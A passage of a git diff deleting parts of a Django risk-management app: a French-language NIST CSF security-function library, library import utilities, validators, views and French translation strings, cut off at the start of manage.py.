"contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "PR.PT-5", - "description": "D\u00e9finissez des sc\u00e9narios pour les diff\u00e9rents modes de fonctionnement de vos syst\u00e8mes. Par ex. : fonctionnalit\u00e9s en cas d\u2019attaque, fonctionnalit\u00e9s pendant la phase de r\u00e9cup\u00e9ration, fonctionnalit\u00e9s normales pendant l\u2019exploitation.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "DE.AE-1", - "description": "D\u00e9finissez des valeurs par d\u00e9faut pour les op\u00e9rations r\u00e9seau licites et les flux de donn\u00e9es pr\u00e9vus pour les utilisateurs et les syst\u00e8mes. Surveillez ces valeurs en permanence.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "DE.AE-2", - "description": "Assurez-vous que les incidents de cybers\u00e9curit\u00e9 d\u00e9tect\u00e9s sont analys\u00e9s quant \u00e0 leurs objectifs et m\u00e9thodes.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "DE.AE-3", - "description": "Assurez-vous que les informations sur les incidents de cybers\u00e9curit\u00e9 provenant de diff\u00e9rentes sources et capteurs sont compil\u00e9es et exploit\u00e9es.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "DE.AE-4", - "description": "D\u00e9terminez les cons\u00e9quences probables des incidents.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "DE.AE-5", - "description": "D\u00e9finissez les valeurs limites au-del\u00e0 desquelles les incidents de cybers\u00e9curit\u00e9 doivent g\u00e9n\u00e9rer des alertes.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "DE.CM-1", - "description": "Mettez en place une surveillance permanente du r\u00e9seau pour d\u00e9tecter les incidents de cybers\u00e9curit\u00e9 potentiels.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "DE.CM-2", - "description": "Mettez en place une surveillance continue (monitorage) de tous les \u00e9quipements et des b\u00e2timents pour d\u00e9tecter les incidents de cybers\u00e9curit\u00e9.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "DE.CM-3", - "description": "Mettez en place un monitorage de l\u2019utilisation des TIC par les employ\u00e9s pour d\u00e9tecter les incidents de cybers\u00e9curit\u00e9 potentiels.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "DE.CM-4", - "description": "Veillez \u00e0 pouvoir d\u00e9tecter les maliciels.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "DE.CM-5", - "description": "Veillez \u00e0 pouvoir d\u00e9tecter les maliciels sur les appareils mobiles.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "DE.CM-6", - "description": "Assurez-vous que les activit\u00e9s des prestataires de services externes sont surveill\u00e9es (monitor\u00e9es) pour d\u00e9tecter d\u2019\u00e9ventuels incidents de cybers\u00e9curit\u00e9.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "DE.CM-7", - "description": "Surveillez votre syst\u00e8me en permanence pour \u00eatre certain que des activit\u00e9s ou acc\u00e8s li\u00e9s \u00e0 des personnes, \u00e9quipements ou logiciels non autoris\u00e9s seront d\u00e9tect\u00e9s.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "DE.CM-8", - "description": "Proc\u00e9dez \u00e0 des tests de vuln\u00e9rabilit\u00e9.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "DE.DP-1", - "description": "D\u00e9finissez clairement les r\u00f4les et les responsabilit\u00e9s pour que tous sachent bien qui est responsable de quoi et qui a telles ou telles comp\u00e9tences.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "DE.DP-2", - "description": "Assurez-vous que les processus de d\u00e9tection correspondent aux exigences et conditions fix\u00e9es.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "DE.DP-3", - "description": "Testez vos processus de d\u00e9tection.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "DE.DP-4", - "description": "Communiquez aux personnes concern\u00e9es (par ex. fournisseurs, clients, partenaires, autorit\u00e9s) les incidents que vous avez d\u00e9tect\u00e9s.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "DE.DP-5", - "description": "Am\u00e9liorez en permanence vos processus de d\u00e9tection.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RS.RP-1", - "description": "Assurez-vous que le plan d\u2019intervention est correctement suivi et rapidement ex\u00e9cut\u00e9 si un incident de cybers\u00e9curit\u00e9 est d\u00e9tect\u00e9.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RS.CO-1", - "description": "Assurez-vous que toutes les personnes connaissent leurs t\u00e2ches et la marche \u00e0 suivre lorsqu\u2019elles doivent r\u00e9agir \u00e0 un incident de cybers\u00e9curit\u00e9.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RS.CO-2", - "description": "D\u00e9finissez des crit\u00e8res pour les communications et assurez-vous que les incidents de cybers\u00e9curit\u00e9 sont signal\u00e9s et trait\u00e9s conform\u00e9ment \u00e0 ces crit\u00e8res.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RS.CO-3", - "description": "Partagez les informations sur les incidents de cybers\u00e9curit\u00e9 relev\u00e9s \u2013 ainsi que les enseignements qui en d\u00e9coulent \u2013 selon ces crit\u00e8res pr\u00e9d\u00e9finis.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RS.CO-4", - "description": "Coordonnez-vous avec les parties prenantes selon ces crit\u00e8res.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RS.CO-5", - "description": "Am\u00e9liorez la sensibilisation aux incidents de cybers\u00e9curit\u00e9 gr\u00e2ce \u00e0 des \u00e9changes r\u00e9guliers avec vos partenaires.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RS.AN-1", - "description": "Assurez-vous que les alertes \u00e9manant de syst\u00e8mes de d\u00e9tection sont prises en compte et d\u00e9clenchent des enqu\u00eates.\u00a0", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RS.AN-2", - "description": "Veillez \u00e0 pouvoir \u00e9valuer correctement l\u2019impact d\u2019un incident de cybers\u00e9curit\u00e9.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RS.AN-3", - "description": "Effectuez une analyse technique apr\u00e8s chaque incident.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RS.AN-4", - "description": "Classez les incidents selon les exigences du plan de r\u00e9action.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RS.AN-5", - "description": "Des processus sont \u00e9tablis pour recevoir, analyser et traiter les failles report\u00e9es \u00e0 l'organisation par des sources internes et externes (par exemple lors de tests d'intrusion, via des bulletins de s\u00e9curit\u00e9 ou des chercheurs en s\u00e9curit\u00e9).", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RS.MI-1", - "description": "Assurez-vous que les incidents de cybers\u00e9curit\u00e9 peuvent \u00eatre circonscrits et que vous pouvez stopper leur propagation.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RS.MI-2", - "description": "Assurez-vous de pouvoir r\u00e9duire l\u2019impact des incidents de cybers\u00e9curit\u00e9.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RS.MI-3", - "description": "Veillez \u00e0 r\u00e9duire au maximum les failles r\u00e9cemment d\u00e9couvertes ou r\u00e9f\u00e9rencez-les comme des risques acceptables.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RS.IM-1", - "description": "Assurez-vous que les enseignements tir\u00e9s des pr\u00e9c\u00e9dents incidents de cybers\u00e9curit\u00e9 sont int\u00e9gr\u00e9s \u00e0 vos plans d\u2019intervention.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RS.IM-2", - "description": "Actualisez vos strat\u00e9gies de r\u00e9action.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RC.RP-1", - "description": "Assurez-vous que le plan de r\u00e9cup\u00e9ration est suivi \u00e0 la lettre en cas d\u2019incident de cybers\u00e9curit\u00e9.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RC.IM-1", - "description": "Assurez-vous que les enseignements tir\u00e9s des pr\u00e9c\u00e9dents incidents de cybers\u00e9curit\u00e9 sont int\u00e9gr\u00e9s \u00e0 vos plans de r\u00e9cup\u00e9ration.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RC.IM-2", - "description": "Actualisez vos strat\u00e9gies de r\u00e9cup\u00e9ration.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RC.CO-1", - "description": "Anticipez les r\u00e9actions du public pour ne pas d\u00e9grader la r\u00e9putation de votre entreprise.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RC.CO-2", - "description": "Veillez \u00e0 ce que votre entreprise retrouve vite une image positive apr\u00e8s un incident de cybers\u00e9curit\u00e9.", - "provider": "NIST CSF", - "contact": "" - } - }, - { - "type": "security_function", - "fields": { - "name": "RC.CO-3", - "description": "Communiquez \u00e0 l\u2019interne aux parties prenantes tout ce que vous avez entrepris en mati\u00e8re de r\u00e9cup\u00e9ration, sans oublier les cadres et la direction.", - "provider": "NIST CSF", - "contact": "" - } - } - ] -} \ No newline at end of file diff --git a/library/models.py b/library/models.py deleted file mode 100644 index 71a8362..0000000 --- a/library/models.py +++ /dev/null @@ -1,3 +0,0 @@ -from django.db import models - -# Create your models here. diff --git a/library/tests.py b/library/tests.py deleted file mode 100644 index 7ce503c..0000000 --- a/library/tests.py +++ /dev/null @@ -1,3 +0,0 @@ -from django.test import TestCase - -# Create your tests here. diff --git a/library/tests/__init__.py b/library/tests/__init__.py deleted file mode 100644 index e69de29..0000000 diff --git a/library/urls.py b/library/urls.py deleted file mode 100644 index 6293dd6..0000000 --- a/library/urls.py +++ /dev/null @@ -1,11 +0,0 @@ -from django.urls import path -from django.contrib.auth.decorators import login_required - -from . import views - -urlpatterns = [ - path('', login_required(views.LibraryListView.as_view()), name='library-list'), - path('/', login_required(views.LibraryDetailView.as_view()), name='library-detail'), - - path('import_default_library/', login_required(views.import_default_library), name='import-default-library'), -] \ No newline at end of file diff --git a/library/utils.py b/library/utils.py deleted file mode 100644 index 902114c..0000000 --- a/library/utils.py +++ /dev/null @@ -1,346 +0,0 @@ -from core.models import Threat, SecurityFunction, RiskMatrix -from django.contrib import messages -from django.contrib.auth.models import Permission -from iam.models import Folder, RoleAssignment -from mira import settings -from django.utils.translation import gettext_lazy as _ - -from .validators import * - -import os -import json - -def get_available_library_files(): - ''' - Returns a list of available library files - - Returns: - files: list of available library files - ''' - files = [] - path = settings.BASE_DIR / 'library/libraries' - # print absolute path - print(os.path.abspath(path)) - for f in os.listdir(path): - if os.path.isfile(os.path.join(path, f)) and f.endswith('.json'): - files.append(f) - return files - -def get_available_libraries(): - ''' - Returns a list of available libraries - - Returns: - libraries: list of available libraries - ''' - files = get_available_library_files() - path = settings.BASE_DIR / 'library/libraries' - libraries = [] - for f in files: - with open(path / f, 'r', encoding='utf-8') as file: - libraries.append(json.load(file)) - libraries.sort(key=lambda x: x['locale'] + x['name'].lower()) - return libraries - -def get_library_names(): - ''' - Returns a list of available library names - - Returns: - names: list of available library names - ''' - libraries = get_available_libraries() - names = [] - for l in libraries: - names.append(l['name']) - return names - -def get_library(name): - ''' - Returns a library by name - - Args: - name: name of the library to return - - Returns: - library: library with the given name - ''' - libraries = get_available_libraries() - for l in libraries: - if l['name'] == name: # TODO: use slug or cook-up some unique id instead of using 'name' - return l - return None - -def get_library_items(library, type): - ''' - Returns a list of items of a given type from a library - - Args: - library: library to return items from - type: type of items to return - - Returns: - items: list of items of the given type from the library - ''' - items = [] - for item in library['items']: - if item['type'] == type: - items.append(item) - return items - -def import_matrix(fields): - ''' - Imports a matrix from a library - - Args: - fields: matrix fields - - Returns: - matrix: imported matrix - ''' - required_fields = ['name', 'description', 'probability', 'impact', 'risk', 'grid'] - - if not validate_object(required_fields, fields): - raise Exception('Invalid matrix') - - matrix = RiskMatrix.objects.create( - name=fields['name'], - description=fields['description'], - json_definition=json.dumps(fields), - folder=Folder.get_root_folder() # TODO: make this configurable - ) - - return matrix - -def import_threat(fields): - ''' - Imports a threat from a library - - Args: - fields: threat fields - - Returns: - threat: imported threat - ''' - required_fields = ['name', 'description'] - - if not validate_object(required_fields, fields): - raise Exception('Invalid threat') - - threat = Threat.objects.create( - name=fields['name'], - description=fields['description'], - provider=fields['provider'], - folder=Folder.get_root_folder() # TODO: make this configurable - ) - - return threat - -def import_security_function(fields): - ''' - Imports a security function from a library - - Args: - fields: security function fields - - Returns: - security_function: imported security function - ''' - required_fields = ['name', 'description'] - - if not validate_object(required_fields, fields): - raise Exception('Invalid security function') - - security_function = SecurityFunction.objects.create( - name=fields['name'], - description=fields['description'], - provider=fields['provider'], - folder=Folder.get_root_folder() # TODO: make this configurable - ) - - return security_function - -def import_matrix_view(request, fields): - ''' - Imports a matrix from a library - - Args: - fields: matrix fields - - Returns: - matrix: imported matrix - ''' - required_fields = ['name', 'description', 'probability', 'impact', 'risk', 'grid'] - - if not validate_object(required_fields, fields): - messages.error(request, _('Library was not imported: invalid matrix.')) - raise Exception('Invalid matrix') - - matrix = RiskMatrix.objects.create( - name=fields['name'], - description=fields['description'], - json_definition=json.dumps(fields), - folder=Folder.get_root_folder() # TODO: make this configurable - ) - - return matrix - -def import_threat_view(request, fields): - ''' - Imports a threat from a library - - Args: - fields: threat fields - - Returns: - threat: imported threat - ''' - required_fields = ['name', 'description'] - - if not validate_object(required_fields, fields): - messages.error(request, _('Library was not imported: invalid threat.')) - raise Exception('Invalid threat') - - threat = Threat.objects.create( - name=fields['name'], - description=fields['description'], - provider=fields['provider'], - folder=Folder.get_root_folder() # TODO: make this configurable - ) - - return threat - -def import_security_function_view(request, fields): - ''' - Imports a security function from a library - - Args: - fields: security function fields - - Returns: - security_function: imported security function - ''' - required_fields = ['name', 'description'] - - if not validate_object(required_fields, fields): - messages.error(request, _('Library was not imported: invalid security function.')) - raise Exception('Invalid security function') - - security_function = SecurityFunction.objects.create( - name=fields['name'], - description=fields['description'], - provider=fields['provider'], - folder=Folder.get_root_folder() # TODO: make this configurable - ) - - return security_function - -def ignore_library_object(library_objects, object_type): - ''' - Return two lists of objects to ignore or upload - - Args: - library_objects: objects to filter - object_type: type of the objects - ''' - ignored_list = [] - uploaded_list = [] - for library_objects in library_objects: - if object_type.objects.filter(name=library_objects['name']).exists(): - ignored_list.append(library_objects) - else: - uploaded_list.append(library_objects) - return uploaded_list, ignored_list - - -def import_library(library): - ''' - Imports a library - - Args: - library: library to import - ''' - matrices = [] - threats = [] - security_functions = [] - - for obj in library.get('objects'): - if obj['type'] == 'matrix': - matrices.append(obj.get('fields')) - elif obj['type'] == 'threat': - threats.append(obj.get('fields')) - elif obj['type'] == 'security_function': - security_functions.append(obj.get('fields')) - else: - raise Exception(_('Unknown object type: {}').format(obj["type"])) - - for matrix in matrices: - import_matrix(matrix) - - for threat in threats: - import_threat(threat) - - for security_function in security_functions: - import_security_function(security_function) - - return True - -def is_import_permited(request, object_type): - ''' - Verify user permissions to import a library - - Args: - object_type: type of the object being imported - ''' - object_type = object_type.replace("_", "") - if object_type == 'matrix': # dirty hack to avoid changing the library format - object_type = 'riskmatrix' - if not RoleAssignment.is_access_allowed(request.user, Permission.objects.get(codename=f"add_{object_type}"), Folder.get_root_folder()): - messages.error(request, _("Library was not imported: permission denied for: {}").format(object_type)) - raise Exception(f"Permission denied for: {object_type}") - return True - -def import_library_view(request, library): - ''' - Imports a library - - Args: - library: library to import - ''' - matrices = [] - threats = [] - security_functions = [] - objects_uploaded = 0 - objects_ignored = 0 - - for obj in library.get('objects'): - if obj['type'] == 'matrix' and is_import_permited(request, obj['type']): - matrices.append(obj.get('fields')) - elif obj['type'] == 'threat' and is_import_permited(request, obj['type']): - threats.append(obj.get('fields')) - elif obj['type'] == 'security_function' and is_import_permited(request, obj['type']): - security_functions.append(obj.get('fields')) - else: - messages.error(request, _('Library was not imported: unknown object type: {}').format(obj['type'].replace("_", " "))) - raise Exception(f'Unknown object type: {obj["type"]}') - - uploaded_list, ignored_list = ignore_library_object(matrices, RiskMatrix) - objects_ignored += len(ignored_list) - objects_uploaded += len(uploaded_list) - for matrix in uploaded_list: - import_matrix_view(request, matrix) - - uploaded_list, ignored_list = ignore_library_object(threats, Threat) - objects_ignored += len(ignored_list) - objects_uploaded += len(uploaded_list) - for threat in uploaded_list: - import_threat_view(request, threat) - - uploaded_list, ignored_list = ignore_library_object(security_functions, SecurityFunction) - objects_ignored += len(ignored_list) - objects_uploaded += len(uploaded_list) - for security_function in uploaded_list: - import_security_function_view(request, security_function) - - messages.success(request, _('Library "{}" imported successfully. {} object(s) imported and {} object(s) ignored.').format(library["name"], objects_uploaded, objects_ignored)) - return True \ No newline at end of file diff --git a/library/validators.py b/library/validators.py deleted file mode 100644 index f1ecd04..0000000 --- a/library/validators.py +++ /dev/null @@ -1,81 +0,0 @@ -import os -from django.core.exceptions import ValidationError -from django.core.validators import FileExtensionValidator - -def validate_object(required_fields, fields): - """ - Checks if the given object has all required fields - - Args: - required_fields: list of required fields - fields: object to check - - Returns: - valid: True if the object has all required fields, False otherwise - """ - for field in required_fields: - if not fields.get(field): - raise ValidationError(f"Missing required field: {field}") - return True - -def validate_file_extension(file): - """ - Checks if the given file has a valid extension, raises a ValidationError if - the extension is not valid. - - Valid extensions are: .json - - Args: - file: file to check - """ - allowed_extensions = ['json'] - validator = FileExtensionValidator(allowed_extensions) - validator(file) - -def validate_matrix(matrix): - """ - Checks if the given matrix is valid - - Args: - matrix: matrix to check - - Returns: - valid: True if the matrix is valid, False otherwise - """ - pass - -def validate_threat(threat): - """ - Checks if the given threat is valid - - Args: - threat: threat to check - - Returns: - valid: True if the threat is valid, False otherwise - """ - pass - -def validate_security_function(security_function): - """ - Checks if the given security function is valid - - Args: - security_function: security function to check - - Returns: - valid: True if the security function is valid, False otherwise - """ - pass - -def validate_library(library): - """ - Checks if the given library is valid - - Args: - library: library to check - - Returns: - valid: True if the library is valid, False otherwise - """ - pass diff --git a/library/views.py b/library/views.py deleted file mode 100644 index 7b3d995..0000000 --- a/library/views.py +++ /dev/null @@ -1,100 +0,0 @@ -from typing import Optional -from core.models import RiskMatrix, Threat -from iam.models import RoleAssignment - -from .utils import * -from .forms import * - -from django.views.generic import TemplateView, ListView, FormView -from django.views import View -from django.contrib import messages -from django.urls import reverse_lazy -from django.shortcuts import redirect -from django.utils.translation import gettext_lazy as _ - -from core.views import BaseContextMixin -import json - -class LibraryListView(BaseContextMixin, FormView): - template_name = 'library/library_list.html' - form_class = UploadFileForm - success_url = reverse_lazy('library-list') - - def get_queryset(self): - qs = get_available_libraries() - for lib in qs: - lib['threats'] = len([x for x in lib['objects'] if x['type'] == 'threat']) - lib['matrices'] = len([x for x in lib['objects'] if x['type'] == 'matrix']) - lib['security_functions'] = len([x for x in lib['objects'] if x['type'] == 'security_function']) - lib['objects'].clear() - return qs - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - context['libraries'] = self.get_queryset() - context['matrix_import'] = RoleAssignment.is_access_allowed(self.request.user, Permission.objects.get(codename="add_riskmatrix"), Folder.get_root_folder()) - context['threat_import'] = RoleAssignment.is_access_allowed(self.request.user, Permission.objects.get(codename="add_threat"), Folder.get_root_folder()) - context['securityfunction_import'] = RoleAssignment.is_access_allowed(self.request.user, Permission.objects.get(codename="add_securityfunction"), Folder.get_root_folder()) - context['form'] = UploadFileForm() - return context - - def post(self, request, *args, **kwargs): - form_class = self.get_form_class() - form = self.get_form(form_class) - files = request.FILES.getlist('file') - for f in files: - try: - validate_file_extension(f) - library = json.load(f) - import_library_view(request, library) - return self.form_valid(form) - except ValidationError as e: - messages.error(request, _("Failed to import file: {}. {}").format(f.name, e.message % e.params)) - return self.form_invalid(form) - - -class LibraryDetailView(BaseContextMixin, TemplateView): - template_name = 'library/library_detail.html' - - def get_context_data(self, **kwargs): - context = super().get_context_data(**kwargs) - library = get_library(kwargs['library']) - context['library'] = library - context['types'] = self.get_object_types(library) - matrices_list = [] - for matrices in self.get_matrices(library): - fields = matrices['fields'] - matrices_list.append(RiskMatrix(name=fields['name'], - description=fields['description'], - json_definition=json.dumps(fields))) - context['matrices'] = matrices_list - object_type = self.get_object_types(library).pop().replace("_", "") - if object_type == "matrix": - object_type = "riskmatrix" - context['can_import'] = RoleAssignment.is_access_allowed( - self.request.user, - Permission.objects.get(codename="add_"+object_type), - Folder.get_root_folder()) - context['crumbs'] = {'library-list': _('Libraries')} - return context - - def get_object_types(self, library): - types = set() - for obj in library.get('objects'): - types.add(obj['type']) - return types - - def get_matrices(self, library): - matrices = [] - for obj in library.get('objects'): - if obj['type'] == 'matrix': - matrices.append(obj) - return matrices - -def import_default_library(request, library_name): - try: - library = get_library(library_name) - import_library_view(request, library) - except: - messages.error(request, _("Failed to import library: {}").format(library_name)) - return redirect("library-list") \ No newline at end of file diff --git a/locale/fr/LC_MESSAGES/django.po b/locale/fr/LC_MESSAGES/django.po deleted file mode 100644 index 998d15c..0000000 --- a/locale/fr/LC_MESSAGES/django.po +++ /dev/null @@ -1,291 +0,0 @@ -# SOME DESCRIPTIVE TITLE. -# Copyright (C) YEAR THE PACKAGE'S COPYRIGHT HOLDER -# This file is distributed under the same license as the PACKAGE package. -# FIRST AUTHOR , YEAR. -# -#, fuzzy -msgid "" -msgstr "" -"Project-Id-Version: PACKAGE VERSION\n" -"Report-Msgid-Bugs-To: \n" -"POT-Creation-Date: 2023-05-03 23:39+0000\n" -"PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE\n" -"Last-Translator: FULL NAME \n" -"Language-Team: LANGUAGE \n" -"Language: \n" -"MIME-Version: 1.0\n" -"Content-Type: text/plain; charset=UTF-8\n" -"Content-Transfer-Encoding: 8bit\n" -"Plural-Forms: nplurals=2; plural=(n > 1);\n" - -#: iam/forms.py:118 iam/forms.py:162 -msgid "" -"Raw passwords are not stored, so there is no way to see this user’s " -"password, but you can change the password using this form." -msgstr "" -"Les mots de passe bruts ne sont pas stockés, il n'y a donc aucun moyen de " -"voir le mot de passe de cet utilisateur, mais vous pouvez modifier le mot de " -"passe en utilisant ce formulaire." - -#: iam/forms.py:157 -msgid "To change your email address, please contact your administrator." -msgstr "" -"Pour changer votre adresse email, veuillez contacter votre administrateur." - -#: iam/models.py:29 iam/models.py:333 -msgid "Domain" -msgstr "Domaine" - -#: iam/models.py:30 iam/models.py:61 -msgid "name" -msgstr "nom" - -#: iam/models.py:35 -msgid "user group" -msgstr "groupes d'utilisateurs" - -#: iam/models.py:36 iam/models.py:230 -msgid "user groups" -msgstr "groupes d'utilisateurs" - -#: iam/models.py:58 -msgid "permissions" -msgstr "" - -#: iam/models.py:92 -msgid "GLOBAL" -msgstr "" - -#: iam/models.py:93 -msgid "DOMAIN" -msgstr "DOMAINE" - -#: iam/models.py:98 -msgid "parent folder" -msgstr "dosier parent" - -#: iam/models.py:108 iam/models.py:344 -msgid "Folder" -msgstr "Dossier" - -#: iam/models.py:109 -msgid "Folders" -msgstr "Dossiers" - -#: iam/models.py:184 -msgid "Welcome to Mira!" -msgstr "Bienvenue sur MIRA!" - -#: iam/models.py:208 -msgid "last name" -msgstr "nom" - -#: iam/models.py:209 -msgid "first name" -msgstr "prénom" - -#: iam/models.py:213 -msgid "active" -msgstr "actif" - -#: iam/models.py:216 -msgid "" -"Designates whether this user should be treated as active. Unselect this " -"instead of deleting accounts." -msgstr "" -"Désigne si cet utilisateur doit être traité comme actif. Désélectionnez ceci " -"au lieu de supprimer les comptes." - -#: iam/models.py:220 -msgid "date joined" -msgstr "date d'inscription" - -#: iam/models.py:222 -msgid "superuser status" -msgstr "statut superutilisateur" - -#: iam/models.py:225 -msgid "" -"Designates that this user has all permissions without explicitly assigning " -"them." -msgstr "" -"Désigne que cet utilisateur a toutes les autorisations sans les assigner " -"explicitement." - -#: iam/models.py:233 -msgid "" -"The user groups this user belongs to. A user will get all permissions " -"granted to each of their user groups." -msgstr "" -"Les groupes d'utilisateurs auxquels cet utilisateur appartient. Un " -"utilisateur obtiendra toutes les autorisations accordées à chacun de ses " -"groupes d'utilisateurs." - -#: iam/models.py:251 -msgid "user" -msgstr "utilisateur" - -#: iam/models.py:252 -msgid "users" -msgstr "utilisateurs" - -#: iam/models.py:339 -msgid "Role" -msgstr "Rôle" - -#: iam/models.py:341 -msgid "sub folders are visible" -msgstr "les sous-dossiers sont visibles" - -#: library/forms.py:6 serdes/forms.py:6 -msgid "Select a file" -msgstr "Sélectionner un fichier" - -#: library/utils.py:176 -msgid "Library was not imported: invalid matrix." -msgstr "Bibliothèque non importée: matrice invalide." - -#: library/utils.py:201 -msgid "Library was not imported: invalid threat." -msgstr "Bibliothèque non importée: menace invalide." - -#: library/utils.py:226 -msgid "Library was not imported: invalid security function." -msgstr "Bibliothèque non importée: fonction de sécurité invalide." - -#: library/utils.py:275 -msgid "Unknown object type: {}" -msgstr "Objet de type inconnu : {}" - -#: library/utils.py:299 -msgid "Library was not imported: permission denied for: {}" -msgstr "Bibliothèque non importée: autorisation refusée pour : {}" - -#: library/utils.py:324 -msgid "Library was not imported: unknown object type: {}" -msgstr "Bibliothèque non importée: objet de type inconnu : {}" - -#: library/utils.py:345 -msgid "" -"Library \"{}\" imported successfully. {} object(s) imported and {} object(s) " -"ignored." -msgstr "" -"Bibliothèque \"{}\" importée avec succès. {} objets importés et {} objets " -"ignorés." - -#: library/views.py:52 -msgid "Failed to import file: {}. {}" -msgstr "Échec de l'importation du fichier : {}" - -#: library/views.py:78 -msgid "Libraries" -msgstr "Bibliothèques" - -#: library/views.py:99 -msgid "Failed to import library: {}" -msgstr "Échec de l'importation de la bibliothèque : {}" - -#: serdes/forms.py:14 -msgid "File must be a JSON file." -msgstr "Le fichier doit être un fichier JSON." - -#: serdes/templates/serdes/backup_restore.html:8 -msgid "Backup Restore" -msgstr "Sauvegarde et restauration" - -#: serdes/templates/serdes/backup_restore.html:14 -msgid "Export backup" -msgstr "Exporter une sauvegarde" - -#: serdes/templates/serdes/backup_restore.html:16 -msgid "Dump database" -msgstr "Exporter la base de données" - -#: serdes/templates/serdes/backup_restore.html:20 -msgid "Import backup" -msgstr "Importer une sauvegarde" - -#: serdes/templates/serdes/backup_restore.html:35 -msgid "Upload" -msgstr "Télécharger" - -#: serdes/templates/serdes/backup_restore.html:71 -msgid "Import backup?" -msgstr "Importer une sauvegarde ?" - -#: serdes/templates/serdes/backup_restore.html:80 -msgid "" -"This action cannot be undone. This will restore the database to a previous " -"state. Are you sure you want to do this?" -msgstr "" -"Cette action ne peut être annulée. Cela restaurera la base de données à un " -"état antérieur. Êtes-vous sûr de vouloir faire cela ?" - -#: serdes/templates/serdes/backup_restore.html:86 -msgid "No, take me back" -msgstr "Non, revenir en arrière" - -#: serdes/templates/serdes/backup_restore.html:88 -msgid "Yes" -msgstr "Oui" - -#~ msgid "First Connexion" -#~ msgstr "Première connexion" - -#~ msgid "The two password fields didn’t match." -#~ msgstr "Les deux champs de mot de passe ne correspondent pas." - -#~ msgid "Password" -#~ msgstr "Mot de passe" - -#~ msgid "Password confirmation" -#~ msgstr "Confirmation du mot de passe" - -#~ msgid "Enter the same password as before, for verification." -#~ msgstr "Entrez le même mot de passe que précédemment, pour vérification." - -#~ msgid "Successfully imported library: {}" -#~ msgstr "Bibliothèque importée avec succès : {}" - -#~ msgid "Objects of type:" -#~ msgstr "Objets de type :" - -#~ msgid "Threat name" -#~ msgstr "Nom de la menace" - -#~ msgid "Matrix name" -#~ msgstr "Nom de la matrice" - -#~ msgid "Probability" -#~ msgstr "Probabilité" - -#~ msgid "Risk" -#~ msgstr "Risque" - -#~ msgid "Security function name" -#~ msgstr "Nom de la fonction de sécurité" - -#~ msgid "Provider" -#~ msgstr "Fournisseur" - -#~ msgid "Default libraries" -#~ msgstr "Bibliothèques par défaut" - -#~ msgid "Library name" -#~ msgstr "Nom de la bibliothèque" - -#~ msgid "Import" -#~ msgstr "Importer" - -#~ msgid "No library found." -#~ msgstr "Aucune bibliothèque trouvée." - -#~ msgid "Upload your own library" -#~ msgstr "Télécharger votre propre bibliothèque" - -#~ msgid "Upload a library" -#~ msgstr "Télécharger une bibliothèque" - -#~ msgid "Invalid form." -#~ msgstr "Formulaire invalide." diff --git a/manage.py b/manage.py deleted file mode 100755 index d7ffefa..0000000 --- a/manage.py +++ /dev/null @@ -1,22 +0,0 @@ -#!/usr/bin/env python -"""Django's command-line utility for administrative tasks.""" -import os -import sys - - -def main(): - """Run 